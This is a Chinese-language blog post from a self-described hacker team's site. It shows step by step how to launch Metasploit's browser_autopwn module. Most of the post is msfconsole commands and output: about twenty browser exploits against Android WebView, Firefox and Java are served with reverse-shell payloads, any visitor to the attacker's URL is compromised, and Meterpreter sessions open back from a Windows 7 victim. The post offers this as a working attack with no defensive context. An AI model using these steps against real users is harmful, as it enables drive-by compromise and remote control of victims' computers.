注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[MSF] 浏览器自动攻击模块 browser autopwn  

2015-04-07 09:28:53|  分类: 渗透测试 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
msf > use server/browser_autopwn

msf auxiliary(browser_autopwn) > set LHOST 192.168.85.158
LHOST => 192.168.85.158
msf auxiliary(browser_autopwn) > set uripath /
uripath => /
msf auxiliary(browser_autopwn) > exploit

启动后 会出现一大堆东西 自动配置。。。 这个过程中 可能会有点卡

[*] Auxiliary module execution completed

[*] Setup
msf auxiliary(browser_autopwn) > [*] Obfuscating initial javascript 2015-03-09 10:01:40 +0800
[*] Done in 0.998089445 seconds

[*] Starting exploit modules on host 192.168.85.158...
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/vSLlstVoA
[*]  Local IP: http://192.168.85.158:8080/vSLlstVoA
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/oISSxImiEAXC
[*]  Local IP: http://192.168.85.158:8080/oISSxImiEAXC
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/BqCNLrTEe
[*]  Local IP: http://192.168.85.158:8080/BqCNLrTEe
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/ApjxJEver
[*]  Local IP: http://192.168.85.158:8080/ApjxJEver
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/tXLCWIpj
[*]  Local IP: http://192.168.85.158:8080/tXLCWIpj
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/oWvUykVRLNw
[*]  Local IP: http://192.168.85.158:8080/oWvUykVRLNw
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/cnhviFFDZwXG
[*]  Local IP: http://192.168.85.158:8080/cnhviFFDZwXG
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/yDjWAzlAuhL
[*]  Local IP: http://192.168.85.158:8080/yDjWAzlAuhL
[*] Server started.

中间省略  出现下面这个 就完成了

[*] --- Done, found 21 exploit modules

[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.85.158:8080/
[*] Server started.


当有人浏览到http://192.168.85.158:8080/  http://和最后的/不能省略

成功后。。。。拿到 Meterpreter Shell

[*] Sending stage (30355 bytes) to 192.168.85.135
[*] Session ID 2 (192.168.85.158:7777 -> 192.168.85.135:50351) processing InitialAutoRunScript 'migrate -f'
[*] Session ID 1 (192.168.85.158:7777 -> 192.168.85.135:50342) processing InitialAutoRunScript 'migrate -f'
[*] Session ID 3 (192.168.85.158:7777 -> 192.168.85.135:50357) processing InitialAutoRunScript 'migrate -f'
[*] Meterpreter session 5 opened (192.168.85.158:7777 -> 192.168.85.135:50359) at 2015-03-09 10:19:48 +0800
[*] Session ID 4 (192.168.85.158:7777 -> 192.168.85.135:50358) processing InitialAutoRunScript 'migrate -f'
[*] Session ID 5 (192.168.85.158:7777 -> 192.168.85.135:50359) processing InitialAutoRunScript 'migrate -f'
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : WIN-K0T1CRVHLQ5
OS          : Windows 7 6.1 (x86)
Meterpreter : java/java
meterpreter >
  评论这张
 
阅读(2316)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016